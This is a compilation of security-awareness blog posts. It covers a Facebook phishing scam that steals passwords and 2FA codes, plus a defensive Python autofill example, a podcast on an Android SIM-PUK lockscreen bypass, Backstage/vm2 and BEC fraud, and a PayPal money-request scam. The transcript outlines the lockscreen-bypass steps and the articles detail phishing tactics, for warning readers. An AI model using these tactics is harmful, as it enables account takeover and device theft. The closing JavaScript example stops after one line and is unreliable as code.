
How social media scammers buy time to steal your 2FA codes

Phishing scams that try to trick you into putting your real password into a fake site have been around for decades.

As regular Naked Security readers will know, precautions such as using a password manager and turning on two-factor authentication (2FA) can help to protect you against phishing mishaps, because:

  • Password managers associate usernames and passwords with specific web pages. This makes it hard for password managers to betray you to bogus websites by mistake, because they can’t put in anything for you automatically if they’re faced with a website they’ve never seen before. Even if the fake site is a pixel-perfect copy of the original, with a server name that’s close enough to be almost indistinguishable to the human eye, the password manager won’t be fooled because it’s typically looking out for the URL, the whole URL, and nothing but the URL.
  • With 2FA turned on, your password alone is usually not enough to log in. The codes used by 2FA systems typically work once only, whether they’re sent to your phone via SMS, generated by a mobile app, or computed by a secure hardware dongle or keyfob that you carry separately from your computer. Knowing (or stealing, buying or guessing) only your password is no longer enough for a cybercriminal to falsely “prove” they are you.
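As an added illustration (not code from the article or from any password manager), here is the origin-keyed matching the first bullet describes, modelled in Python: a saved login is offered only when scheme, host and port match exactly, so a lookalike host never gets a fill. The vault entry, the sample credentials and the hypothetical host facebook-help-123456.example (standing in for the article’s facebook-help-nnnnnn pattern) are all constructed for this example.

```python
from urllib.parse import urlsplit

# Constructed example vault: one saved login, keyed by exact origin
# (scheme + host + port), which is how the article describes password
# managers deciding whether to offer an autofill at all.
VAULT = {
    "https://www.facebook.com": {
        "username": "alice@example.com",      # constructed sample value
        "password": "correct-horse-example",  # constructed sample value
    },
}


def origin_of(url):
    """Return the origin of a URL as 'scheme://host[:port]', or None.

    Only http(s) URLs count; a default port is dropped so that
    https://www.facebook.com:443/ and https://www.facebook.com/ match.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    host = parts.hostname.lower().rstrip(".")  # urlsplit already lowercases; belt and braces
    default_port = 443 if parts.scheme == "https" else 80
    try:
        port = parts.port or default_port
    except ValueError:  # non-numeric or out-of-range port
        return None
    if port == default_port:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def autofill_candidate(url, vault=VAULT):
    """Offer a saved credential only for an exact origin match.

    Lookalike hosts, brand names buried in a subdomain or path, the
    userinfo trick (https://www.facebook.com@other.example/) and a plain
    http copy of a saved https site all yield None: nothing is filled in.
    """
    origin = origin_of(url)
    if origin is None:
        return None
    return vault.get(origin)


def brand_lookalike(url, brand_host):
    """Review-level heuristic: the brand's name appears in the URL's host or
    path, but the host is neither brand_host nor one of its subdomains.

    This is the check a human eye fails at ('facebook-help-123456') and a
    machine does not; it is a flag for review, not proof of phishing.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    brand_host = brand_host.lower()
    if host == brand_host or host.endswith("." + brand_host):
        return False
    brand_label = brand_host.split(".")[0]  # 'facebook' from 'facebook.com'
    return brand_label in host or brand_label in parts.path.lower()


if __name__ == "__main__":
    # Constructed URLs modelled on the article's flow.
    samples = [
        "https://www.facebook.com/login/",                              # genuine: filled
        "https://facebook-help-123456.example/appeal",                  # scam host: not filled
        "https://www.facebook.com.facebook-help-123456.example/login",  # brand as subdomain: not filled
        "https://www.facebook.com@facebook-help-123456.example/",       # userinfo trick: not filled
        "http://www.facebook.com/login/",                               # wrong scheme: not filled
    ]
    for u in samples:
        filled = autofill_candidate(u) is not None
        flagged = brand_lookalike(u, "facebook.com")
        print(f"{u}\n  autofill={filled}  lookalike={flagged}")
```

Note that the lure page in this scam lives on facebook.com itself, so origin matching only protects the step where a password is actually requested; it does nothing against the initial fake “Intellectual Property” account.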

Unfortunately, these precautions can’t immunise you completely against phishing attacks, and cybercriminals are getting better and better at tricking innocent users into handing over both their passwords and their 2FA codes at the same time, as part of the same attack…

…at which point the crooks immediately try to use the combination of username + password + one-time code they just got hold of, in the hope of logging in quickly enough to get into your account before you realise there’s anything phishy going on.

Even worse, the crooks will often aim to create what we like to call a “soft dismount”, meaning that they create a believable visual conclusion to their phishing expedition.

This often makes it look as though the activity that you just “approved” by entering your password and 2FA code (such as contesting a complaint or cancelling an order) has completed correctly, and therefore no further action is necessary on your part.

Thus the attackers not only get into your account, but also leave you feeling unsuspicious and unlikely to follow up to see if your account really has been hijacked.

The short but winding road

Here’s a Facebook scam we received recently that tries to lead you down exactly that path, with differing levels of believability at each stage.

The scammers:

  • Pretend that your own Facebook page violates Facebook’s terms of use. The crooks warn that this could lead to your account being shut down. As you know, the brouhaha currently erupting on and around Twitter has turned issues such as account verification, suspension and reinstatement into noisy controversies. As a result, social media users are understandably concerned about protecting their accounts in general, whether they’re specifically concerned about Twitter or not:
    The unsolicited email “warning” that starts it all.
  • Lure you to a real page with a facebook.com URL. The account is fake, set up entirely for this particular scam campaign, but the link that shows up in the email you receive does indeed lead to facebook.com, making it less likely to attract suspicion, either from you or from your spam filter. The crooks have titled their page Intellectual Property (copyright complaints are very common these days), and have used the official logo of Meta, the parent company of Facebook, in order to add a touch of legitimacy:
    A fraudulent user account page with an official-looking name and icon.
  • Provide you with a URL to contact Facebook to appeal against cancellation. The URL above doesn’t end in facebook.com, but it starts with text that makes it look like a personalised link of the form facebook-help-nnnnnn, where the crooks claim that the digits nnnnnn are a unique identifier that denotes your specific case:
    The phishing site pretends to be a “personalised” page about your complaint.
  • Collect largely innocent-sounding data about your Facebook presence. There’s even an optional field for Additional info where you’re invited to argue your case. (See image above.)

Now “prove” yourself

At this point, you need to provide some proof that you are indeed the owner of the account, so the crooks then tell you to:

  • Authenticate with your password. The site you’re on has the text facebook-help-nnnnnn in the address bar; it uses HTTPS (secure HTTP, i.e. there’s a padlock showing); and the branding makes it look similar to Facebook’s own pages:
    The crooks ask you to “prove” your ID via your password.
  • Provide the 2FA code to go with your password. The dialog here is very similar to the one used by Facebook itself, with the wording copied directly from Facebook’s own user interface. Here you can see the fake dialog (top) and the real one that would be displayed by Facebook itself (bottom):
    Then they ask for your 2FA code, just like Facebook would.
    The real 2FA dialog used by Facebook itself.
  • Wait up to five minutes in the hope that the “account block” may be removed automatically. The crooks play both ends here, by inviting you to leave well alone in order not to interrupt a possible immediate resolution, and suggesting that you should stay on hand in case further information is requested:
    The crooks try to buy time with a simple 5-minute progress bar.

As you can see, the likely result for anyone who got sucked into this scam in the first place is that they’ll give the crooks a full five-minute window during which the attackers can try logging into their account and taking it over.

The JavaScript used by the criminals on their booby-trapped site even appears to contain a message that can be triggered if the victim’s password works correctly but the 2FA code they supplied doesn’t:

 The login code you entered doesn't match the one sent to your phone. Please check the number and try again.

The end of the scam is perhaps the least convincing part, but it nevertheless serves to shift you automatically off the scammy site and to land you back somewhere entirely genuine, namely Facebook’s official Help Center:

Finally, the crooks redirect you to a legitimate Facebook help page.

What to do?

Even if you aren’t a particularly serious social media user, and even if you operate under a pseudonym that doesn’t obviously and publicly link back to your real-life identity, your online accounts are valuable to cybercriminals for three main reasons:

  • Full access to your social media accounts could give the crooks access to the private aspects of your profile. Whether they sell this information on the dark web, or abuse it themselves, its compromise could increase your risk of identity theft.
  • The ability to post via your accounts lets the crooks peddle misinformation and fake news under your good name. You could end up kicked off the platform, locked out of your account, or in public trouble, unless and until you can show that your account was broken into.
  • Access to your chosen contacts means the crooks can aggressively target your friends and family. Your own contacts are not only much more likely to see messages that come from your account, but also more likely to take a serious look at them.

Simply put, by letting cybercriminals into your social media account, you ultimately put not just yourself but also your friends and family, and even everyone else on the platform, at risk.

What to do?

Here are three quick-fire tips:

  • TIP 1. Keep a record of the official “unlock your account” and “how to deal with intellectual property challenges” pages of the social networks you use. That way, you never need to rely on links sent via email to find your way there in future. Common tricks used by attackers include concocted copyright infringements; made-up infringements of Terms and Conditions (as in this case); bogus claims of fraudulent logins you need to review; and other fake “issues” with your account. The crooks often include some time pressure, as in the 24-hour limit claimed in this scam, as further encouragement to save time by simply clicking through.
  • TIP 2. Don’t be tricked by the fact that the “click-to-contact” links are hosted on legitimate sites. In this scam, the initial contact page is hosted by Facebook, but it’s a fraudulent account, and the phishing pages are hosted, complete with a valid HTTPS certificate, via Google, but the content that’s served up is bogus. These days, the company hosting the content is rarely the same as the individuals creating and posting it.
  • TIP 3. If in doubt, don’t give it out. Never feel pressured to take risks to complete a transaction quickly because you’re afraid of the outcome if you take time to stop, to think, and only then to connect. If you aren’t sure, ask someone you know and trust in real life for advice, so you don’t end up trusting the sender of the very message you aren’t sure you can trust. (And see TIP 1 above.)

Remember, with Black Friday and Cyber Monday coming up this weekend, you’ll probably be receiving lots of genuine offers, plenty of fraudulent ones, and any number of well-meant warnings about how to improve your cybersecurity specifically for this time of year…

…but please keep in mind that cybersecurity is something to take seriously all year round: start yesterday, do it today, and keep it up tomorrow!


S3 Ep109: How one leaked email password could drain your business [Audio + Transcript]

DON’T LET ONE LOUSY EMAIL PASSWORD SINK THE COMPANY

Microsoft’s tilt at the MP3 marketplace. Apple’s not-a-zero-day emergency. Cracking the lock on Android phones. Browser-in-the-Browser revisited. The Emmenthal cheese attack. Business Email Compromise and how to prevent it.


With Doug Aamoth and Paul Ducklin. Intro and outro music by Edith Mudge.

You can listen to us on Soundcloud, Apple Podcasts, Google Podcasts, Spotify, Stitcher and anywhere that good podcasts are found. Or just drop the URL of our RSS feed into your favourite podcatcher.



DOUG.  A not-quite zero-day, a lock screen bypass, email scams, and Emmenthal cheese.

All that, and more, on the Naked Security podcast.

[MUSICAL MODEM]

Welcome to the podcast, everybody.

I am Doug Aamoth; he is Paul Ducklin.

Paul, how do you do today?


DUCK.  I’m great, Doug.

And I don’t think you mentioned the Billionaire Gucci master.


DOUG.  He is part of “All that and more”, of course!


DUCK.  Oh, and much, MUCH more, Doug. [LAUGHS]


DOUG.  Exactly.

We do like to start the show with our This Week in Tech History segment.

This is exciting for me because I was there, man!

This week on 14 November 2006, Microsoft released the Zune, a 30 gigabyte portable media player meant to compete with Apple’s iPod.

Microsoft would make its way through three generations of Zune players, a music subscription service, and a handful of other fits and starts before canning the hardware in 2011 and the software and services in 2012.

I was working at TechCrunch at the time, and the general consensus was that not until the Zune HD, which came out in 2009, were we talking about the Good Zune.

But by then it was too little, too late, because the iPod touch came out in 2007…

…and I remember covering that event and being awed by such a device.

I can’t remember the last time I was awed by such a thin MP3 player; you could download songs directly to it.

That was the story of the Zune for me.

The hardware and the screen, though, were really good, so it was hard to not like it…

…it just was missing something, and then they shut everything down, so it didn’t really matter.

Between the Zune and Windows Phone: those were two initiatives by Microsoft I really wanted to work, and they just didn’t quite work.


DUCK.  I loved my Windows Phone, believe it or not.

It’s always the third version with Microsoft, isn’t it?

Windows 3?


DOUG.  The Zune, too – third version!


DUCK.  And I thought, “Great!”

But as soon as I fell in love with Windows Phone, they discontinued it, just when it got good. [LAUGHS]


DOUG.  Well, we can stay on the subject of Apple, because this is not quite a zero-day, but it was dangerous enough to warrant an emergency patch:

Emergency code execution patch from Apple – but not an 0-day


DUCK.  Yes, it wasn’t a zero-day because it was disclosed responsibly, as far as I know.

It was a bug in an XML parsing library called libxml2… my own Linux distro got an update that happened to include that fix.

Now, nobody else seemed to get terribly excited about the libxml2 update.

It was just, “Hey, they found a bug, they fixed it: get the new version.”

But Apple… just suddenly these updates arrived.

And they fixed the libxml2 bugs only for the very latest versions of their operating system.

So, macOS 13 Ventura and iOS/iPadOS 16.


DOUG.  So, if I’m an Apple user and I’m not running the latest version of either of these operating systems, I’m in the dark about whether I need some sort of update.

Am I waiting on an update, or is my current version, which isn’t 13.0 or 16.1… is it safe?


DUCK.  That’s the problem that we have every time this happens, isn’t it?

Where there’s an update for the latest versions and not the others.

So I wish Apple would make it clearer whether there were updates expected for other devices, or even why they felt it was necessary to push out an update just specifically for that one library.

My best guess is that when they were informed about the bug and their own security people started looking at it, they figured, “I wonder if you could exploit this… OH NO! It’s far too easy.”

Maybe they found that there was some part of Apple’s code that was just (if you like) too close to the edge of the network or the edge of the device, that might mean that somebody could quickly figure out how to exploit it.

So why not patch it?

If so, great, but it would be nice to know that!


DOUG.  So I guess the best advice we can give is to go to the software updates section and see if there’s something there.

If not, sit tight and we’ll keep an eye on it.

OK, let’s shift gears from Apple to Android.

We’ve got a SIM-swap lockscreen bypass, and this lockscreen bypass is kind of frightening in that it was an accidental discovery, so it could happen to anybody:

Dangerous SIM-swap lockscreen bypass – update Android now!

So it’s kind of serious!

And Google kind of dragged their feet a little bit fixing it…


DUCK.  Yes, Doug.

The fascinating thing about this is… I couldn’t think of a better way to describe it than a SIM-swap attack, because it involves swapping a SIM card.

But it’s not what we normally think of as a “number porting” attack where you go to a mobile phone store and you trick them, cajole them, bribe them, induce them to issue you with a brand new SIM with somebody else’s number applied to it, so you can take over their messages and read their two factor authentication codes to log into their account.

That’s one type of SIM swap.

In this case, the bug was triggered for somebody who has restarted their phone.

And in this case, because the chap had been travelling and his phone had run out of juice, he was forced to go through a full reboot.

When you go through a reboot, if you’ve got a PIN set on your SIM card (which you should have, or someone could just steal your phone, remove the SIM card, and start receiving all your calls and your texts)… well, he got the PIN wrong, and you only get three goes, then you lock yourself out.

Now you have to go and get the 10-digit PUK, which is the unlock code for the SIM itself.

You only get 10 goes at that, after which the SIM basically destroys itself and is no more use.

But he noticed that, when he put in the PUK… he realised that he was at the lockscreen, *but the wrong one*.

He was at the kind of phone lockscreen that allowed him to unlock with his fingerprint.

Not the “You’ve just rebooted your phone; you have to unlock properly with your full passcode” screen.

So he figured, “I’ve landed up in the wrong place. This shouldn’t happen. I should be locked out of my phone with more than just my fingerprint.”

And so he was able to find out that he could, if he got the SIM PIN wrong deliberately and he timed it right… he could bypass the lock code on a locked phone.

Just like that, Doug!


DOUG.  OK, so where does the SIM *swap* come in in this case?


DUCK.  Well, that’s the thing…

Imagine that you steal somebody’s phone and you realise, “Oh, dear, it’s locked.”

Now, you swap the SIM, but instead of trying to swap their *number* onto a new SIM of yours, you just go to the convenience store, buy a new SIM card, swap it into their *phone*…

…and you know the PIN on the new SIM card, so you *deliberately get it wrong three times*.

Now you’re at the PUK code entry.

You read the PUK code off the packaging, because it’s printed there… scratch it off with a coin; there’s the magic code.

You put that in, and, “Bingo!”

You’ve done his bypass!


DOUG.  If I’m a pickpocket or a criminal, or I find a phone on the ground, normally in this day and age, you think, “Oh, it’s useless because it’s locked and I’m not going to be able to get into it to wipe it and then sell it.”

In this case, you can actually do that… just buy a cheap, a free SIM; you can wipe it and sell it.


DUCK.  And, as the chap who discovered it, David Schütz, points out:

“I might be overreacting, but, I mean, not so long ago, the FBI was fighting with Apple for almost the same thing.”

I’ve got somebody else’s phone… is there a magic way, with some special hardware, that I can unlock it?

And it turns out that, with Android, if you got the timing right, yes, there *was* some special hardware, and you could go to a convenience store and buy that hardware off the shelf for $1!


DOUG.  OK, so this is serious.

So, he takes it to Google and they do what?

Do they say, “We’re going to fix it right away”… or not?


DUCK.  I think both of those: “Yeah, OK, well, someone reported this before, but we couldn’t get it to work.”

Then nothing happened, and nothing happened…

So his disclosure deadline came around, and he went to Google and said, “I’m going to disclose this, but I’m uncomfortable. What are we going to do about it?”

And, fortunately, Google then came to the party, and in the November 2022 update (he found this back in June 2022)… in the November 2022 update, they did provide the fix.

Bless his heart, he said, “Look, I’ll come to your offices and I’ll show you that it does work.”

And apparently he’s smart enough to find vulnerabilities and do bug bounty hunting for a living, it seems…

…but not smart enough to realise that when you’re in an office building and you don’t have a proper SIM ejector tool, there’s probably a paperclip somewhere around.

So instead of asking for a paperclip, he tried to use a needle, and apparently stabbed himself. [LAUGHS]

It is now fixed, but if you’ve got an Android phone, do make sure that you have the November 2022 update!


DOUG.  OK, we talked not too long ago about a Firefox “Browser-in-the-browser” attack, which I found fascinating… and it looks like we may have the potential for another one, thanks to a new fullscreen bypass:

Firefox fixes fullscreen fakery flaw – get the update now!


DUCK.  Yes!

Firefox 107 came out this week, and I think the Extended Support Release is 102.5.

(Remember, it’s “102+5 = 107”, so that’s no feature fixes, but all the security fixes.)

There’s nothing critical, there are no zero-days, but there are lots of high-severity vulnerabilities, and the one that caught my eye is a very simple and possibly trivial-sounding bug.

There’s a way to get the browser into fullscreen mode without popping up that little warning that says, “Hey, guys, the browser is now in fullscreen mode, so don’t forget that everything you see *is the browser*; press Escape or F11 (or whateveritis) to get back to the regular screen.”

And you think, “How harmful is that?”

But if you remember, that Browser-in-the-Browser attack was where you paint what looks like an operating system popup dialog inside the browser window, and you trick people into putting, say, a password in there, thinking they’re communicating with Windows…

…when in fact they’re communicating with the browser:

Serious Security: Browser-in-the-browser attacks – watch out for windows that aren’t!

And I think it was one Douglas Aamoth who said to people, “Hey, just grab the window, the fake popup, if you’re suspicious, and try and move it outside the real browser window. And if it won’t go there, you know you’re looking at a fake.”

So, imagine… what’s the risk of accidental fullscreen?

Well, then you paint a fake browser window *inside which you paint a fake popup*.

And then, when the person follows your very good advice, Doug, and drags the fake popup, it *will* go outside the fake browser window and you’ll go, “OK, maybe it’s real after all.”

So the problem with fullscreen is it means that code running inside the browser (untrusted JavaScript, HTML, CSS, etc.) gets to paint effectively any pixel on the screen.


DOUG.  I was also thinking: a brilliant way to abuse this (now don’t do this, don’t try this at home!) would be to make it seem as though the user’s session had, for some reason, just logged out.

So you’re back to a “login screen”… it’s fullscreen, and it asks you to enter your password.

I mean, I have a button on my keyboard that logs me out if I hit it accidentally, and now it wants my password to get back in…


DUCK.  [LAUGHS] Doug, I’m glad you’re a colleague of mine, that’s all I’m saying, not working for the other side! [LAUGHS]


DOUG.  And if I were really enterprising (I wouldn’t really do this, of course!), I know that Windows changes the login picture every day to a different beautiful vista…

…I would just check which one is going on today, and I would cycle that every day to the newest one, once I knew what the new one was going to be.


DUCK.  Are you sure you’re not a naughty boy, Doug? [LAUGHTER]


DOUG.  So, let’s get those Firefox browsers updated, and move on to what you described as the “Emmenthal cheese” attack.

Now, if I were writing the headline… your headline was great, it was very descriptive, but you could have drawn people in with the headline just being The Emmenthal cheese attack, or why defence in depth is important.

Though you have “Log4Shell” in there… that’ll probably pull more people in than cheese:

Log4Shell-like code execution hole in popular Backstage dev tool


DUCK.  [MOCK AFFRONT] Are you accusing me of what I believe is called “Search Engine Optimisation”?


DOUG.  [MOCK RIGHTEOUSNESS] I would never!


DUCK.  Thank you, Doug.

It is Log4Shell-like, and I did think that people would remember Log4Shell because it’s kind of hard to forget:

Log4Shell: The Movie… a short, safe visual tour for work and home

I was worried, if I put Emmenthal cheese in the headline, that if you don’t exactly know that that is a type of cheese that generally has bubbles in it from the gas that’s generated while it ferments, and therefore when you slice it, it has circular holes in it; if you don’t know that, then… [PAUSES] I suppose I could have put a picture of a slice of Emmenthal cheese, but that would have been a bit cheesy.


DOUG.  Well Krafted!


DUCK.  Anyway, the affected tool is a thing called Backstage, and I believe it was originally developed as a developer’s toolkit for building what are called APIs, application programming interfaces.

As the name suggests, it’s more of a back-end tool, so you loosely expect it to be inside your network, but nevertheless, if it’s part of your business logic services, then you do want to make sure that they don’t have any bugs.

And I call it the Emmenthal Cheese Attack, because, fortunately, it’s not just like Log4Shell, where lots of services were exposed inadvertently and you could just send them random HTTP requests…

…and loads of them would fall into the hole of trying to process a string that contained special “secret characters” that caused them to run unauthorised commands.

In this case, it was more like having several slices of Emmenthal cheese, with all the holes in.

And if you can, as the attacker, figure out that in this network the slices are lined up so there is at least one hole next to another hole on every slice, then you can thread a string through there and get in.

The good news is, of course, that means that if you can move any one of the slices to a position where there’s *no hole that goes all the way through*, you defend against it.


DOUG.  So what are the holes that an attacker would have to thread his or her way through to hit paydirt?


DUCK.  Well, firstly they’d need to be able to access a server that had the buggy code on in the first place, to send a request.

That might be possible if you’d already broken into the network but you had limited access… say you’d compromised a developer’s computer so you could make internal API calls.

Or it might happen if you just have some services that rely on this that are visible externally.

But it’s a good reminder of some of the supply-chain complexity that comes when you use products like node.js (server side JavaScript), and the NPM Node Package Manager repository.

Because Backstage contains a thing, I think, called Scaffolder, which is a plugin that helps you arrange all your various API backends nicely.

And Scaffolder uses a logging system called (don’t shoot the messenger, Doug, I’m just reporting the name; I didn’t make it up.)… this is a Mozilla tool, I believe [LAUGHING] called Nunjucks (I don’t know where they get these names from!), and that’s a logging tool.

So like Log4J, it has magic characters like ${{ …special stuff in here that might include commands to run on the server side… }}.

And that is wrapped in a thing called vm2, which is another NPM module, another Node JavaScript module.

That one is a sandbox that’s supposed to make riskier JavaScript code a bit safer by limiting what it can do.

And, unfortunately, the company that found the problem with the whole Backstage system, Oxeye… their researchers had previously, in August 2022, found a hole that allowed them to sneak through this vm2 sandbox.

So the good news is the proof-of-concept they produced required the last slice of Emmenthal cheese *still to have the hole in that was patched back in August 2022*.

So, as suggested, the solution is to make sure that one, some or all of your Swiss cheese slices are moved so that there are no holes that go all the way through.

And that’s easy enough to do by patching Backstage, and making sure that your vm2 is patched.

Quite a few products use this vm2 sandbox – it’s meant to improve security.

So you may have vm2 even if you don’t have Backstage.

We’ve got all the full version numbers you need to go and look for in the Naked Security article, Doug.


DOUG.  OK, very good.

And last, but certainly not least, a wild story about Business Email Compromise [BEC].


DUCK.  We have reached the Billionaire Gucci Master, currently serving an 11-stretch [an 11-year prison term] in the United States of America, Doug:

“Gucci Master” business email scammer Hushpuppi gets 11 years

So he’s no longer living the high life in Dubai like he was a couple of years ago!


DOUG.  Maybe not quite a master if he’s in jail…


DUCK.  Well, if you look at the photos that were on his Instagram account, you can see that, at least for a while, he certainly wasn’t short of money.

So he wasn’t pretending to be rich, but he *was* pretending to have acquired his wealth legitimately… he claimed to be a real estate wheeler-dealer.

In fact, as you say, he was part of a so-called business email compromise/money laundering network.

And, just to reiterate, business email compromise… that term is used fairly generally these days for crimes that are predominantly orchestrated via email that pretends to be from a company, but I prefer to keep that term BEC for where the crooks not only pretend to be sending emails, say, from your CEO or your CFO, or someone senior in accounting, but they *actually have that person’s email password*.

So, when they send their fake emails, they don’t just look like they come from the real account, they actually do come from the real account.

And, as you can imagine, that’s quite a simple crime to pull off, because you can go on the dark web and buy email passwords, and you only need one for the right person.

Once you’re inside the email, you probably get, if the person is in the accounts department, a surprisingly regular and reliable newsfeed of which deals are going down, what accounts need paying, and what big accounts are about to get paid in.

And so you try and convince either the customer who’s about to pay off a debt, or you convince someone in the company itself who is about to pay out to a supplier who’s a creditor… you convince them to pay into the wrong account.

Behind the scenes, you have a whole lot of money mules and other affiliates in your cybercrime network who are out there going through the know-your-customer process with banks.

Anyway, he was busted, and apparently he pleaded guilty.

He’s been in custody for two years, I believe, awaiting trial:

Flashy Nigerian Instagram star extradited to US to face BEC charges

He finally decided to plead guilty: he faced 20 years; he got 135 months, which is just over eleven years.

So he didn’t get the maximum sentence, presumably because he pleaded guilty, and he officially admitted to two very sizable amounts that he had stolen.

One from a company in New York; that amount was close to $1,000,000.

And one from a businessman in Qatar; I believe that was also close to $1,000,000.

So he has to pay back $1.7 million to those victims as part of the whole deal.

But what was fascinating to me in this was the information that came out from the investigations that were done into this chap, who’s known as Ray Hushpuppi.

A fascinating insight into all the moving parts that are needed behind business email compromise scams, and how much effort the crooks put into staying just one step ahead of the fraud prevention mechanisms that are in place by each bank, in each country, for each type of account, for transfers between Country A and Country B, and so on…

…and thus figuring out the “holes” in their slices of Swiss cheese that they can thread their needles through.

If you don’t mind me mixing yet another metaphor, Doug.


DOUG.  It’s enough work that you could probably go out and get a regular job, and probably make… maybe not this much money, but some decent honest money.

The amount of work you have to put in keeping track of all these banking regulations and how to move money!

“I can move it within the UK, but I can’t move it to Mexico”… all these things that he had to think about and deal with.

It’s a fascinating read, if you want to head over there and read the full report.

But we do have some advice for people as far as avoiding business email compromise, starting with: Turn on two factor authentication (2FA).


DUCK.  Indeed, Doug.

You might as well make sure that a stolen password alone, or one that was bought on the dark web, is not enough for crooks to get in.

We’ve said many times before that 2FA is not enough on its own – it doesn’t magically protect you against all sorts of attack, but it does mean that crooks who don’t know how to get hold of passwords themselves, but who go out online and buy them, can’t just instantly steam in and start scamming you.


DOUG.  And then we’ve got: Look for features in your service provider’s products that can warn you when anomalies occur.

That’s a good one.


DUCK.  Yes.

Tools such as EDR or XDR (that’s extended detection and response)… they’re not only there to help you find blunders, they’re also there to make sure that the security precautions that are supposed to be in place really are there; that they’re really doing what you think.

And so, if you’re keeping a lookout for things that might have gone wrong but you haven’t noticed yet, you are in a much better position than just waiting for a known security alert to pop up in your dashboard.

These days, that, on its own, is *necessary*, but it is no longer *sufficient*.


DOUG.  And I really like this one: Enforce a two step or more process for making significant changes to accounts or services, especially changes in details for outgoing payments.


DUCK.  It’s easy to say, “But why would any company or business person fall for that? It’s so obvious.”

But if the crooks have an in, say to the CFO or the head of accounting’s email, they know exactly the right time to mention the right contracts and the right amounts.

As always, two pairs of eyes are better than one…

And not just something where, “Oh, I have to get my manager to click the button” and it all goes through…

…for something like paying out a million pounds, you need to make it comparatively difficult.

Ideally, you need two separate teams who investigate whether the account change should go through entirely independently.

It also makes it harder for insiders to collude, of course, if there are two separate teams that are operating separately.


DOUG.  OK: If you see anything that doesn’t look right in an email demanding your attention, assume you’re being scammed.


DUCK.  Yes, we had a Naked Security commenter once (I think you mentioned it on the podcast, didn’t you, Doug?) where they said, “Hey, I spotted that a scammer was inside our network sending emails, because they used an emoji where I was 99% certain that the sender of the email just wouldn’t have done so. [LAUGHTER] Not that they don’t know what emojis are, it’s just not their style.”


DOUG.  And that dovetails nicely with our next tip: If you want to check details with another company based on an email, never rely on contact data provided in the email, especially when money is involved.


DUCK.  Yes, I think you covered that elegantly last week, Doug, didn’t you, by saying, “You know, when there’s a phone number in the email, don’t phone it up and say, ‘Hi. Is that Twitter?’ Always find your own way there.”


DOUG.  And then last, but certainly not least: Consider using internal training tools to teach your staff about scams.


DUCK.  Unsurprisingly, Sophos has just such a tool… we’re not giving that tip because we want to sound like salespeople, but Sophos Phish Threat, that’s our tool to help you:

If you don’t put your employees to the test, where they can fail the test and then you can use that as an opportunity to teach them how to do better next time…

…if you don’t test them, the crooks are jolly well going to do it for you, and they’re going to try it day after day after day, and they’re not just going to try one person at a time.

Anything you can do to raise your company’s collective resilience has got to be a good thing.

Just make sure that when you do things like phishing tests that you handle the cases of people who fail those tests with great sympathy.


DOUG.  OK, great advice!

And as the sun begins to set on our show for today, we do have our reader comment, and it’s on this story over on Twitter.

@Snowshoedan comments on the Business Email Compromise story:

“it’s ironic that a dude who literally made a living off of other small mistakes made some huge ones. Don’t brag about your lifestyle on the socials if you did it illegally.”


DUCK.  Hushpuppi certainly had millions of followers, and I guess he revelled in that, so he certainly went out of his way to draw attention to himself.

I imagine that he might very well have been caught anyway.

Though the pictures that you see in the Naked Security article came from his Instagram account via the Department of Justice charge sheet to get a warrant for his arrest.

So they used it as part of their own evidence to convince the Magistrate Judge, “This guy is not just making dimes and nickels.”


DOUG.  Excellent.


DUCK.  “That’s definitely a Roller [Rolls Royce car], and that’s definitely a Bentley.”


DOUG.  All right, thank you for sending that in @Snowshoedan.

If you have an interesting story, comment or question you’d like to submit, we’d love to read it on the podcast.

You can email tips@sophos.com, you can comment on any one of our articles, or you can hit us up on social: @NakedSecurity.

That’s our show for today, thanks very much for listening.

For Paul Ducklin, I’m Doug Aamoth, reminding you, until next time to…


BOTH.  Stay secure


Black Friday and retail season – watch out for PayPal “money request” scams

Given that we’re getting into peak retail season, you’ll find cybersecurity warnings with a “Black Friday” theme all over the internet…

…including, of course, right here on Naked Security!

As regular readers will know, however, we’re not terribly keen on online tips that are specific to Black Friday, because cybersecurity matters 365-and-a-quarter days a year.

Don’t take cybersecurity seriously only when it’s Thanksgiving, Hannukah, Kwanzaa, Christmas or any other gift-giving holiday, or only for the New Year Sales, the Spring Sales, the Summer sales or any other seasonal discount opportunity.

As we said when retail season kicked off earlier this month in many parts of the world:

The best reason for improving your cybersecurity in the leadup to Black Friday is that it means you will be improving your cybersecurity for the rest of the year, and will encourage you to keep on improving through 2023 and beyond.

Having said that, this article is about a PayPal-branded scam that was reported to us earlier this week by a regular reader who thought it would be worth warning others about, especially for those with PayPal accounts who may be more inclined to use them at this time of year than any other.

The good thing about this scam is that you should spot it for what it is: made-up nonsense.

The bad thing about this scam is that it’s astonishingly easy for criminals to set up, and it carefully avoids sending spoofed emails or tricking you to visit bogus websites, because the crooks use a PayPal service to generate their initial contact via official PayPal servers.

Here goes.

Spoofing explained

A spoofed email is one that insists it’s from a well-known company or domain, typically by putting a believable email address in the From: line, and by including logos, taglines or other contact details copied from the brand it’s trying to impersonate.

Remember that the name and email address shown in an email next to the word From are actually just part of the message itself, so the sender can put almost anything they like in there, regardless of where they really sent the message from.

A spoofed website is one that copies the look and feel of the real thing, often simply by ripping off the exact web content and images from the original site to make it look as pixel-perfect as possible.

Scam sites may also try to make the domain name that you see in the address bar look at least vaguely realistic, for example by putting the spoofed brand at the left-hand end of the web address, so that you might see something like paypal.com.bogus.example, in the hope that you won’t check the right-hand end of the name, which actually determines who owns the site.

Other scammers try to acquire lookalike names, for example by replacing W (one W-for-Whisky character) with VV (two V-for-Victor characters), or by using I (an upper case I-for-India character) in place of l (a lower case L-for-Lima).

But spoofing tricks of this sort can often be spotted fairly easily, for example by:

  • Learning how to examine the so-called headers of an email message, which shows which server a message actually came from, rather than the server that the sender claimed they sent it from.
  • Setting up an email filter that automatically scans for scamminess in both the headers and the body of every email message that anyone tries to send you.
  • Browsing via a network or endpoint firewall that blocks outbound web requests to fake sites and discards inbound web replies that include risky content.
  • Using a password manager that ties usernames and passwords to specific websites, and thus can’t be fooled by fake content or lookalike names.
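As an added illustration (not code from the article), here is a small JavaScript script that applies the checks above mechanically: it works out the registrable right-hand end of a host name, folds the VV-for-W and I-for-l lookalikes, and compares an email’s From: domain against the first-hop server in its Received: trail. The brand list, the cut-down suffix list and the sample message are all constructed for the demo; a real check would use the full public-suffix list.

```javascript
// Added example, not the article's code. All lists and messages below are
// constructed for the demo.
const BRANDS = ['paypal', 'sophos'];

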